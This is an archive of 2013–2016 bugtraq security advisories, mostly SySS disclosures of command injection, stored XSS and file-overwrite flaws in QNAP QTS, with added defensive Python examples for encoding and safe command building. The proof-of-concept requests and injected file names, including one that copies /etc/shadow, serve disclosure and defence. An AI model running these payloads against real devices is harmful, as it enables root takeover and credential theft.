site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVmAAoJENEtJqSRgP2yoOYIAIAt8/wPa0J2QHCUQpDsO3VH
uekOzXqZhB17FhXKe/N+X3TEFBwO1BE8ohQdprabgd0q+e0Cxiod9Asz+WTE4yZ0
lRNAMfAeMciX9F7UaMj9InNUFkv1sVo4cWGyHRb9DoI+snOEO/DO8Ssx9MbfJMRq
cNSSO9LAz5asuehiJ6YDYhK7EkcLpj0xg38Kku31NwYWCU6jiAvgJc+NkUjtNSRm
ROAtMvx3wuW7XigkVR+mwtMAgLIj+fVOxypcPoyjupTNMUsRgMgHOQVs3j139GQK
LBnyilmAO4S6EDj27FOXEW5PKC0k72uBFDs8U70PCETeI3e92d9gXeBOt6TIlmw=
=9tl1
-----END PGP SIGNATURE-----


[SYSS-2016-054] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-054
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-07
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an os command injection in the appRequest plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/application/appRequest.cgi?=getRemoteRSS HTTP/1.1
Host: 192.168.42.201:8080
Content-Length: 39

lang=geryyy><=qpkg=[validSid]

==
3. The lang-Parameter will be placed inside of a wget-command without
encoding or sanitizing the string. It will be shortened to only 8 
characters lengths, making exploiting difficult. Still e.g. overwriting
critical data would be easy.

The above requests displays an error message in the header, similar to 
the following:

HTTP/1.1 200 OK
Date: Tue, 07 Jun 2016 05:57:57 GMT
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q 
http://download.qnap.com/Liveupdate/QTS4.2.1/qpkgcenter_geryyy><hPÞÿ<}h£a 
   .xml -O /home/httpd/RSS/rssdoc/qpkgcenter_geryyy><hPÞÿ<}h£a  
.xml.tmp 1>>/dev/null 2>>/dev/null'
Content-type: text/xml
Content-Length: 4587




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-07: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-054

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-054.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVoAAoJENEtJqSRgP2ydA0H/jHyaW0S//do0y13oEWH1n8O
QAwTKnWY5SiPOZ6CdEFh+W7VsuZsh5QupIHFm/mYRPZ3gfBmFc/Pk9f/qQFCoHmc
6whFVm/E8WbwasHUo4uLEiFwFOsCSG2j+45+DqF5YIWXQZm/Fk7q+AlSEqQo169+
kvXoZpGD81JAq0TwzpbKFExwip+zxlSdkjffwXoJcNijD1DXIRjx1j5qML9P5W/h
UJVCkAiAoICJf8Cei6jrIDN/LjvHHWtw2R7AFw0Eic3CQjkdWFqAHOEV6s7CNQjD
Rrr3za7BPN6CUe098BDbnXhmIFu4T2ZbJ+88jPMXHUv5NcvZ7SwSIE++uYQ0FmI=
=LzeJ
-END PGP SIGNATURE-


[SYSS-2016-048] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:


The SySS GmbH found an os command injection in the file station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be executed, in this case: /etc/shadow copied
to the current directory. Other code can of course be run as well,
e.g. to display some strings on the front display of the QNAP (tested
with a 470 Pro) name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.




Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed, as can be confirmed by listening
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to address (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7

[SYSS-2016-050] QNAP QTS - Persistent Cross-Site Scripting

2016-08-18 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-050
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the user's browser and
so on.



Proof of Concept (PoC):


1. Log in to the QNAP. The user needs sufficient permissions to create
ZIP files.
2. Right-click on a file or directory and select "compress(ZIP)"
3. In the newly opened window, enter a name containing HTML codes like
blabla
and press OK
4. The code is being executed directly after creating the ZIP.
5. Right-click on the ZIP file and hover over 'Extract'.
Again, the code is being executed.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have the necessary permissions to create
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Vulnerability report updated to fix error in "hover over" 
description.
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-050
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-050.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVlAAoJENEtJqSRgP2yicQH/RVeQNcb3qhDUiLlfRMKmV//
Fxt52iVXKai0QiWN6GqBOIU0qon4xXvWyiwJckox5QMXJWELi4PPNoyPxfipCp0M
Q8jIbm1KbxMt2SAwUUG1fFY1Dvj8/dWt81S/HLWj131M7QParwFhLjiBoFNnerLM
49QSWe4jYonIUbqINqIIEJ1lp3hbHDTBOOlXHQahpxsUvphBsJBKfEJImERJ9vGT
VhJam8WJwwKjxsLRDxUiUiL2waLAhdbi2HeJiZy1CplwRvDst2yA5zdDG5iz5O3G
zcByMMyk5ZfRATGPYTH6tuEx2SWtFVFIIXPL8FtWi/7vKn2pITcj9vADFvANxSM=
=xxMF
-END PGP SIGNATURE-

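The File Station bug in SYSS-2016-050 (and the directory-name variant in SYSS-2016-049) is a user-chosen name that reaches the page unencoded. The following is an added example, not code from the advisory or from QNAP: it shows the rendering-side fix, encoding the name for the HTML context it lands in (text node, attribute, and JSON handed to a client that builds the DOM itself). The sample names and the listing markup are constructed for the example.

```python
"""Added example: context-aware output encoding of file names.
Not part of the SySS advisory or of QTS; listing markup is assumed."""
import html
import json

# Constructed sample names. The second one has the shape of the
# payloads the advisory describes; here it is only ever data.
SAMPLE_NAMES = [
    "report.zip",
    '<img src=x onerror="alert(1)">.zip',
    "O'Brien & Sons.zip",
]


def render_listing_html(names):
    """Server-side listing: each name appears in text context (between
    tags) and in attribute context (title="..."). html.escape with
    quote=True covers both: it rewrites & < > " and '."""
    rows = []
    for name in names:
        safe = html.escape(name, quote=True)
        rows.append(f'<li title="{safe}">{safe}</li>')
    return "<ul>" + "".join(rows) + "</ul>"


def render_listing_json(names):
    """For a client that renders the listing itself (as File Station
    does): ship the names as JSON and let the client assign them with
    textContent, never innerHTML. '</' is escaped so the document can
    also be embedded inside a <script> block without closing it."""
    return json.dumps({"names": names}).replace("</", "<\\/")


def roundtrip_lossless(names):
    """Encoding must not destroy information: the browser decodes the
    entities back to the exact original name. True if that holds for
    every name."""
    return all(html.unescape(html.escape(n, quote=True)) == n for n in names)


if __name__ == "__main__":
    print(render_listing_html(SAMPLE_NAMES))
    print(render_listing_json(SAMPLE_NAMES))
```

The allowlist on file names that the advisory's Solution section implies (only trusted users may create archives) is an access-control mitigation; encoding at the output is what removes the bug itself, because a name is then displayed exactly as typed regardless of who typed it.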

[SYSS-2016-053] QNAP QTS - Arbitrary File Overwrite

2016-08-18 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-053
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: Arbitrary file overwrite (CWE-23)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices [1].



Vulnerability Details:


The SySS GmbH found a vulnerability in the user configuration interface
of the QTS management web application, allowing an authenticated user to
overwrite arbitrary files in /tmp and its subdirectories.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/userConfig.cgi?imbgName=[newNameToOverwrite]=uploadBgImg=[sid] HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Type: multipart/form-data;boundary=foo
Content-Length: 115

--foo
Content-Disposition: form-data; name="filename"; filename="foo.txt"
Content-Type: non-image-jpeg

asdf
--foo--

==
3. The uploaded file will be written to /tmp/[newNameToOverwrite], allowing
the overwriting of e.g. crontabs, PID files and similar files.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the QNAP or the required
permissions to update their profile.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-053
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-053.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVnAAoJENEtJqSRgP2yJOsIAIK6uglJJlCsfk4ZQR/3b0UH
A1MAMDS4EMrW6+4CX5SS+69KHYpXYCGf4jvniEiFtMYyBrkVTVB1DdxWZXAsSVR4
TI/xeWL2ltp1Kjt5uWiDZ41haoeuHCqWd0wB4+L3pQnOqtGi+THMBTt7s0dF3bPX
x0r0qiDmDRR/CikePvw06igwEAJl3+1AxvawHhqCqAkNLQaCT4nzjheYqGhQxXmJ
WWi1kKfWLDc684sjCf0kl0Cldzqw+dw2yx7aa/gderWxI/VwMYO7mZwGcvHQjqSq
MTKH6tbMJ9agLoU2fzJCnk/d5QHk52Rtxu0DPjUl2/7CpFaxyhFE3R/0AKn6Wyw=
=MtKH
-END PGP SIGNATURE-

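SYSS-2016-053 is a request parameter (imbgName) that is joined onto /tmp and used as the write destination without confinement. The following is an added example, not code from the advisory or from QNAP, of how an upload handler keeps a user-supplied name inside its directory: an allowlist on the name, a realpath containment check that catches whatever the allowlist misses, and O_EXCL so an upload can never replace an existing file such as a crontab or PID file. The upload directory name and the sample names are assumptions.

```python
"""Added example: confining an uploaded file name to one directory.
Not the advisory's or QTS's code; UPLOAD_DIR is an assumed location."""
import os
import re
import shutil
import tempfile

UPLOAD_DIR = "/tmp/qts-bgimg"   # assumption: one directory per feature
# Allowlist: starts with an alphanumeric, no separators, image extension.
NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\.(jpg|jpeg|png)$")


class UnsafeName(ValueError):
    """Raised for any name that must not be turned into a path."""


def safe_upload_path(user_name, base=UPLOAD_DIR):
    """Return an absolute path under base for user_name, or raise.
    Two independent checks: the allowlist on the name itself, then a
    realpath containment check so that traversal, absolute paths and
    symlinked directories cannot move the target out of base."""
    if not NAME_RE.fullmatch(user_name):
        raise UnsafeName(f"name rejected by allowlist: {user_name!r}")
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_name))
    if os.path.dirname(target) != base_real:
        raise UnsafeName(f"name escapes upload directory: {user_name!r}")
    return target


def is_safe_name(user_name, base=UPLOAD_DIR):
    """Boolean wrapper for use in request validation."""
    try:
        safe_upload_path(user_name, base)
        return True
    except UnsafeName:
        return False


def write_upload(user_name, data, base=UPLOAD_DIR):
    """Create the file only if it does not exist yet (O_EXCL), owner
    read/write only. An existing file is never overwritten."""
    path = safe_upload_path(user_name, base)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo_overwrite_protection():
    """Round trip in a throwaway directory: the first write succeeds,
    a second write to the same name is refused. Returns (first_ok,
    second_ok); the expected result is (True, False)."""
    base = tempfile.mkdtemp()
    try:
        first = os.path.exists(write_upload("bg.jpg", b"\xff\xd8", base))
        try:
            write_upload("bg.jpg", b"other", base)
            second = True
        except FileExistsError:
            second = False
        return first, second
    finally:
        shutil.rmtree(base)
```

The allowlist alone would already reject the names in the advisory, but the containment check is kept deliberately: it is the check that still holds if someone later relaxes the regular expression.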

[SYSS-2016-052] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-052
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices [1].



Vulnerability Details:


The SySS GmbH found an OS command injection in the userConfig plugin of
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/userConfig.cgi?imbgName=a$([command]).jpg=uploadBgImg=[sid] HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Type: multipart/form-data;boundary=foo
Content-Length: 115

--foo
Content-Disposition: form-data; name="filename"; filename="foo.jpg"
Content-Type: image/jpeg

asdf
--foo--

==
3. The contained command will be executed. An example would be

  $(bash -c '(echo;ls) 1>&2')

complete URL:

  /cgi-bin/userConfig.cgi?imbgName=a$(bash%20-c%20'(echo;ls)%201>%262')Img.jpg=uploadBgImg=[sid]

which will display the content of the current working directory 
(/home/httpd/cgi-bin) as content.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-052
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-052.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVnAAoJENEtJqSRgP2ydicIAINK2g0OkT3PDOVzIz4tQKOL
0oz4npiC8V3PJOSG7bucwMY9J/HQBM8xuCQy6n+7NHMyEYeTOJEDv/RYYl93V4hU
AvbQSDnQHGU3oS81jv5liLGbuRwwP0eemsjSauVoKBlRa3Aj5x0FBDkfmPVlxi+0
HBtNDKFZtd8zqPBwbtvpFvVM4Dk5NkmSdJLGNd9U3/OvNGyX7bUT0ajWli8uNLC9
IUR+4ppnHNlJt1VEX3nvOXEHjRucT5Pe9vwE17bDyj76y4zbuGb8XBTPiajNNrxU
zshJRRdhdpZnVCG4+1l8D196bzNP3gFnmfstF9IqnNHxICUqyw0cK//4HFDgGRM=
=qQT0
-END PGP SIGNATURE-

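SYSS-2016-048 (a ZIP file name passed to the extraction command) and SYSS-2016-052 (the imbgName parameter) share one root cause: a request-controlled string is spliced into a shell command line, so `$(...)` and `;` inside it run with the CGI's privileges. The following is an added example, not code from the advisories or from QNAP: it puts the unsafe string construction beside the argv form that cannot be injected, shows `shlex.quote` for the case where a shell string is unavoidable, and gives a small checker a defender can run over file names or web-server logs. The unzip invocation, the destination directory and the sample names are assumptions; the two payload-shaped names are the ones quoted in the advisories.

```python
"""Added example: building archive-extraction commands without a shell,
plus a metacharacter check for detection. Not QTS's code; the unzip
command line and the share path are assumed."""
import re
import shlex

# Constructed samples; two have the shape of the names in the advisories.
SAMPLE_NAMES = [
    "holiday photos.zip",
    "test$(nslookup examplehost).zip",
    "a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip",
]

DEST = "/share/CACHEDEV1_DATA/Public"          # assumed target directory
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")  # characters a shell acts on


def unsafe_command_line(name, dest=DEST):
    """The vulnerable pattern: the name is interpolated verbatim, so a
    shell parsing the string sees command separators and substitutions
    inside it. Returned as a string for inspection only; not executed."""
    return f"unzip {name} -d {dest}"


def safe_argv(name, dest=DEST):
    """Hardened form: one argument per list element and no shell at all.
    subprocess.run(safe_argv(n)) hands the name to unzip as a single
    argv entry, so metacharacters are just bytes in a file name. A name
    beginning with '-' is prefixed with './' so it cannot be read as an
    option."""
    if name.startswith("-"):
        name = "./" + name
    return ["unzip", name, "-d", dest]


def safe_command_line(name, dest=DEST):
    """When a single shell string is unavoidable (e.g. a remote ssh
    command), quote every element; shlex.quote uses the POSIX rules."""
    return " ".join(shlex.quote(arg) for arg in safe_argv(name, dest))


def shell_token_count(command_line):
    """How many words a POSIX shell would split the string into. The
    unsafe form of a name with a space yields one word more than the
    quoted form: the file name has stopped being a single argument."""
    return len(shlex.split(command_line))


def injection_tokens(name):
    """Detection helper: the sorted set of shell metacharacters present
    in a name. Non-empty means the name deserves a look in the logs."""
    return sorted(set(SHELL_META.findall(name)))


if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(repr(n), "->", injection_tokens(n))
        print("  unsafe:", unsafe_command_line(n))
        print("  argv:  ", safe_argv(n))
```

The argv form is the actual fix; the quoting form is the fallback, and the token check is for triage, not prevention, since a name like the first sample is perfectly legitimate and still breaks the unsafe command.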

[CVE-2016-1926] XSS in Greenbone Security Assistant 6.0.0 and < 6.0.8

2016-01-20 Thread bugtraq
Hello, 

Vulnerability information
===
Date: 13th January 2016
Product: Greenbone Security Assistant 6.0.0 and < 6.0.8
Vendor: OpenVAS 
Risk: Low, CVSS 1.9 (AV:A/AC:M/Au:M/C:P/I:N/A:N) 

Description
===
It has been identified that Greenbone Security Assistant (GSA) is vulnerable to 
cross site scripting due to an improper handling of the parameters of the 
get_aggregate command. Given the attacker has access to a session token of the 
browser session, the cross site scripting can be executed. OpenVAS-7 is not 
affected. 

Fix
===
OpenVAS recommends that the publicly available patches are applied. If building 
from source, then patches r24056 (for Greenbone Security Assistant 6.0.x of 
OpenVAS-8) should be obtained from the OpenVAS SVN repository. For trunk (beta 
status of OpenVAS-9) this was solved with r24055.

A fresh tarball containing the latest stable release of Greenbone Security 
Assistant 6.0 (OpenVAS-8) can be obtained from:


http://wald.intevation.org/frs/download.php/2283/greenbone-security-assistant-6.0.8.tar.gz

In the event that OpenVAS has been supplied as part of a distribution then the 
vendor or organisation concerned should be contacted for a patch. 

Full advisory
===
See [1].

Timeline
===
- 07.01.2016: XSS discovered and reported to vendor.
- 08.01.2016, 08:00: Acknowledgement from vendor and info that fix is already 
in progress.
- 08.01.2016, 17:30: Fix ready, QA and testing needed
- 09.01.2016: Update released for Greenbone Security Manager: Advisory GBSA 
2016-01 [2]
- 13.01.2016: Update released OpenVAS: Advisory OVSA 20160113 [1]
- 18.01.2016: CVE-2016-1926 assigned by MITRE
- 20.01.2016: Blogpost released [3]

References
===
- [1] http://www.openvas.org/OVSA20160113.html
- [2] http://www.greenbone.net/technology/gbsa2016-01.html
- [3] https://en.internetwache.org/cve-2016-1926-xss-in-the-greenbone-security-assistant-20-01-2016/

Regards,
Sebastian Neef


[PSA-2013-1022-1] Microsoft Silverlight Invalid Typecast / Memory Disclosure

2013-10-29 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-1022-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Microsoft Silverlight Invalid Typecast / Memory Disclosure|
++-+
| Release Date   | 2013/10/22  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Vitaliy Toropov |
++-+
| System Affected| Microsoft Silverlight   |
| Versions Affected  | Prior to 5.1.20125.0 (MS13-022) |
|| Prior to 5.1.20913.0 (MS13-087) |
| Related Advisory   | MS13-022 / MS13-087 |
| Related CVE Number | CVE-2013-0074 / CVE-2013-3896   |
| Vendor Patched | 2013/03/12 / 2013/10/08 |
| Classification | 1-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to 
known patched vulnerabilities in Microsoft Silverlight.   These details were 
obtained through the Packet Storm Bug Bounty program and are being released 
to the community.

+--+

+-+
| DETAILS |
+-+

A memory disclosure vulnerability exists in the public WriteableBitmap class
from System.Windows.dll. This class allows reading of image pixels from the 
user-defined data stream via the public SetSource() method.

BitmapSource.ReadStream() allocates and returns a byte array and a count of array
items as out parameters. These returned values are taken from the input stream
and can be fully controlled by the untrusted code. When the returned count 
is greater than array.Length, data outside the array is used as input 
stream data by the native BitmapSource_SetSource() from agcore.dll. Later all 
data can be viewed via the public WriteableBitmap.Pixels[] property.


+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code demonstrating code execution is available here:
http://packetstormsecurity.com/files/123731/

+--+

+---+
| RELATED LINKS |
+---+

http://technet.microsoft.com/en-us/security/bulletin/ms13-022
http://technet.microsoft.com/en-us/security/bulletin/ms13-087

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/





-BEGIN PGP SIGNATURE-
